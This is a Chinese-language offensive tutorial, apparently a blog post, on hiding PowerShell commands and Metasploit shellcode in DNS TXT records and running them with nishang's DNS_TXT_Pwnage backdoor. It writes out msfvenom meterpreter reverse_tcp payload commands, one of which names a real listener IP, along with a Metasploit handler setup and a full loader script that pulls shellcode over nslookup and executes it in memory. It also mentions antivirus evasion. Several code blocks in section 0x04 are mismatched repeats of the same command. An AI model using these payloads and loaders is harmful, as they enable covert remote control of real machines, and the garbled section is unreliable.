0x00簡(jiǎn)介
DNS TXT記錄一般用來(lái)記錄某個(gè)主機(jī)名或者域名設(shè)置的說(shuō)明,在這里可以填寫(xiě)任何東西,長(zhǎng)度限制255�。絕大多數(shù)的TXT記錄是用來(lái)做SPF記錄(反垃圾郵件)��。本篇文章主要介紹如何使用 nishang 通過(guò)創(chuàng)建TXT記錄執(zhí)行powershell腳本�。當(dāng)然����,首先你要有一個(gè)域名。
0x01創(chuàng)建TXT記錄
這里需要使用nishang中的一個(gè)腳本 OUT-DnsTxt ���。
1.常見(jiàn)命令
因?yàn)槌R?jiàn)命令比較短,所以可以直接添加到TXT記錄中�,如下圖:
現(xiàn)在查看一下TXT記錄:
可以看到記錄已經(jīng)成功添加了���。
2.腳本
由于TXT記錄長(zhǎng)度限制為255,如果要添加一個(gè)腳本到記錄里面����,需要添加多個(gè)TXT記錄���。下面是一個(gè)例子,自己寫(xiě)了一個(gè)PSH腳本:
function Get-User { <# .SYNOPSIS Script to generate DNS TXT for a test. .DESCRIPTION Use this script to get user information. to be more big.. more big... big..Do one thing at a time, and do well.Keep on going never give up. .EXAMPLE PS > Get-User #> [CmdletBinding()] Param () net user }使用Out-Dnstxt進(jìn)行轉(zhuǎn)換:
PS F:/DNS> . ./Out-DnsTxt.ps1 PS F:/DNS> Out-DnsTxt -DataToEncode ./Get-User.ps1 You need to create 2 TXT records. All TXT Records written to F:/DNS/encodedtxt.txt
由于這個(gè)腳本比較小����,所以只生產(chǎn)兩行:
可以分別將這兩行內(nèi)容按順序添加到 1.ps.domain.com到2.ps.domian.com中如下圖:
查看TXT�,可以看到內(nèi)容都已經(jīng)添加好了:
0x02 執(zhí)行Powershell
添加完了TXT記錄以后,通過(guò) DNS_TXT_Pwnage.ps1 來(lái)執(zhí)行這些腳本。
DNS_TXT_Pwnage.ps1 是一個(gè)通過(guò)DNS TXT來(lái)接收命令或者腳本的一個(gè)后門(mén)腳本
這里還需要添加兩條記錄,strat與stop��,具體如下圖:
1.執(zhí)行命令
PS F:/DNS> . ./DNS_TXT_Pwnage.ps1 PS F:/DNS> DNS_TXT_Pwnage -startdomain start.evi1cg.me -cmdstring start -commanddomain command.evi1cg.me -psstring test -psdomain xxx.evi1cg.me - Subdomains 1 -StopString stop
解釋一下參數(shù):
startdomain 為創(chuàng)建的 start.domain �����,返回一個(gè)字符串�; cmdstring 為任意輸入的字符串�����; commanddomain 為創(chuàng)建的執(zhí)行命令TXT記錄的域名���; psstring 為任意輸入的字符串���; psdomain 為創(chuàng)建的執(zhí)行腳本TXT記錄的域名或子域名 �; Subdomains 為執(zhí)行腳本創(chuàng)建TXT記錄的個(gè)數(shù)(如1.2中創(chuàng)建的腳本�,該值為2); StopString 為任意輸入的字符串�。
此處比較重要的參數(shù)為 startdomain ����,他會(huì)與我們輸入的cmdstring以及psstring進(jìn)行比較��,如果與cmdstring值相等��,則執(zhí)行 commanddomain 即命令,與psstring相等則執(zhí)行 psdomain 即腳本。
上面為執(zhí)行命令����,所以cmdstring值我們輸入為start�����,與start.evi1cg.me的txt記錄值相等,psstring隨便輸入,不留空就行。執(zhí)行結(jié)果如下圖:
我們可以通過(guò)修改command.domain的TXT值來(lái)執(zhí)行不同的命令�。比如Get-Host:
2.執(zhí)行腳本
PS F:/DNS> . ./DNS_TXT_Pwnage.ps1 PS F:/DNS> DNS_TXT_Pwnage -startdomain start.evi1cg.me -cmdstring bulabula -commanddomain command.evi1cg.me -psstring start -psdomain ps.evi1 cg.me -Arguments Get-User -Subdomains 2 -StopString stop
這里要注意��,psstring的值為start,與start.domain的TXT記錄相同,cmdstring為任意字符串��。效果如下圖:
這里多一個(gè)參數(shù) Arguments �����,要寫(xiě)明要執(zhí)行的函數(shù)名���,測(cè)試發(fā)現(xiàn)�����,在腳本中含有中文時(shí)會(huì)失敗。對(duì)于需要帶參數(shù)的腳本可以修改腳本指定參數(shù)值。
0x03 執(zhí)行Shellcode
可以通過(guò)TXT記錄執(zhí)行shellcode,首先����,我們使用msf生成一個(gè)powershell的shellcode:
? ~ sudo msfvenom -p windows/meterpreter/reverse_tcp -f powershell LHOST=x.x.x.x LPORT=8887 > pspayload.txt
使用Out-DnsTxt對(duì)生成的文件進(jìn)行轉(zhuǎn)換:
PS F:/DNS> Out-DnsTxt -DataToEncode ./pspayload.txt You need to create 3 TXT records. All TXT Records written to F:/DNS/encodedtxt.txt
然后將以上記錄分別添加到TXT記錄中�,如下圖:
測(cè)試使用的32位win7系統(tǒng)����,使用msf開(kāi)啟監(jiān)聽(tīng):
msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LPORT 8887 LPORT => 8887 msf exploit(handler) > set LHOST x.x.x.x LHOST => x.x.x.x msf exploit(handler) > exploit [*] Started reverse handler on x.x.x.x:8887 [*] Starting the payload handler...
我們還需要一個(gè)獲取TXT記錄并執(zhí)行的腳本,這里我改了一個(gè)腳本:
function Execute-Code { <# .PARAMETER Shelldomain The domain (or subdomain) whose subbdomain's TXT records would hold shellcode. .PARAMETER subdomains The number of subdomains which would be used to provide shellcode from their TXT records. .PARAMETER AUTHNS Authoritative Name Server for the domains. .EXAMPLE PS > Execute-Code The payload will ask for all required options. .EXAMPLE PS > Execute-Code -Shelldomain 32.alteredsecurity.com -SubDomains 5 -AUTHNS f1g1ns2.dnspod.net. Use above from non-interactive shell. #> [CmdletBinding()] Param( [Parameter(Position = 0, Mandatory = $True)] [String] $Shelldomain, [Parameter(Position = 1, Mandatory = $True)] [String] $Subdomains, [Parameter(Position = 2, Mandatory = $True)] [String] $AUTHNS ) function Get-ShellCode { Param( [Parameter()] [String] $Shelldomain ) $i = 1 while ($i -le $subdomains) { $getcommand = (Invoke-Expression "nslookup -querytype=txt $i.$Shelldomain $AUTHNS") $temp = $getcommand | select-string -pattern "`"" $tmp1 = "" $tmp1 = $tmp1 + $temp $encdata = $encdata + $tmp1 -replace '/s+', "" -replace "`"", "" $i++ } #$encdata = "" $dec = [System.Convert]::FromBase64String($encdata) $ms = New-Object System.IO.MemoryStream $ms.Write($dec, 0, $dec.Length) $ms.Seek(0,0) | Out-Null $cs = New-Object System.IO.Compression.DeflateStream ($ms, [System.IO.Compression.CompressionMode]::Decompress) $sr = New-Object System.IO.StreamReader($cs) $sc = $sr.readtoend() return $sc } $Shell = (Get-ShellCode $Shelldomain) #Remove unrequired things from msf shellcode $tmp = $Shell -replace "`n","" -replace '/$buf /+/= ',"," -replace '/[Byte/[/]/] /$buf /=' -replace " " [Byte[]]$sc = $tmp -split ',' #Code Execution logic $code = @" [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); [DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr dest, uint src, uint count); "@ $winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru $size = 0x1000 if ($sc.Length -gt 0x1000) {$size = $sc.Length} $x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40) for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt64()+$i), $sc[$i], 1)} Try { $winFunc::CreateThread(0,0,$x,0,0,0) sleep 100000 } Catch { [system.exception] "caught a system exception" } }參數(shù)說(shuō)明, Shelldomain 為創(chuàng)建txt記錄的域名或子域名; subdomains 為創(chuàng)建TXT域名的個(gè)數(shù)����,如上面所創(chuàng)建的為3; AUTHNS 為域的權(quán)威名稱服務(wù)器���,如我使用的狗爹�,所以AUTHNS為f1g1ns2.dnspod.net
在32位win7上執(zhí)行:
PS C:/Users/evi1cg/Desktop> . ./Execute-Code.ps1
成功獲取meterpreter會(huì)話:
64位的請(qǐng)自行修改payload及腳本�。
0x04 補(bǔ)充
Metasploit中已經(jīng)含有此腳本 dns_txt_query_exec.rb ��,此腳本查詢TXT記錄的順序?yàn)閍.domain,b.domain…,下面是一個(gè)示例�,首先生成payload:
? ~ sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=103.238.225.222 LPORT=8887 -e x86/alpha_mixed Bufferregister=EDI -f raw > reverse.txt
使用下面的腳本對(duì)該文件進(jìn)行切割:
PS F:/DNS> . ./Out-DnsTxt.ps1 PS F:/DNS> Out-DnsTxt -DataToEncode ./Get-User.ps1 You need to create 2 TXT records. All TXT Records written to F:/DNS/encodedtxt.txt
0
輸出如下:
將這三行分別添加到a.domain,b.domain,c.domain的TXT記錄中:
生成exe:
PS F:/DNS> . ./Out-DnsTxt.ps1 PS F:/DNS> Out-DnsTxt -DataToEncode ./Get-User.ps1 You need to create 2 TXT records. All TXT Records written to F:/DNS/encodedtxt.txt
1
msf開(kāi)啟監(jiān)聽(tīng):
PS F:/DNS> . ./Out-DnsTxt.ps1 PS F:/DNS> Out-DnsTxt -DataToEncode ./Get-User.ps1 You need to create 2 TXT records. All TXT Records written to F:/DNS/encodedtxt.txt
2
運(yùn)行exe����,獲得meterpreter:
至于免殺,可以直接生成c格式的shellcode,然后按照 打造免殺payload 來(lái)做���。
0x05 小結(jié)
本文主要介紹一種執(zhí)行命令的方式以及nishang的腳本使用,希望能對(duì)大家有幫助��。
